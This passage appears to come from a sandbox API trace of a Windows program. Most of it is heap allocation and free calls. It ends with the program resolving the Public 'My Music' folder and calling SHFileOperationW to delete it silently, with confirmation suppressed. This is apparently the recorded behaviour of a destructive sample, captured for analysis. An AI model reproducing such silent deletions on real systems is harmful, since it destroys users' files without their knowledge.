(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab50 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.290] CloseHandle (hObject=0x2d0) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0267.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.295] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x46) returned 0x2499760 [0267.296] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x8bedfc*="My Music") returned 0x22 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0267.297] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music")) returned 0x2416 [0267.297] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x246d870, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x246d860, ftLastAccessTime.dwLowDateTime=0x246d858, ftLastAccessTime.dwHighDateTime=0x8bf054, ftLastWriteTime.dwLowDateTime=0x76c314dd, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="", cAlternateFileName="\x519\x77aa\xf1fc\x8b\x2042\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\x5c\x55\x73\x65\x72\x73\x5c\x50\x75\x62\x6c\x69\x63\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x5c\x4d\x79\x20\x4d\x75\x73\x69\x63\x5c")) returned 0xffffffff [0267.297] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0267.297] GetLastError () returned 0x6 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.297] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x46) returned 0x2499760 [0267.299] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x8bf658*="My Music") returned 0x22 [0267.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0267.299] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music")) returned 0x2416 [0267.299] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\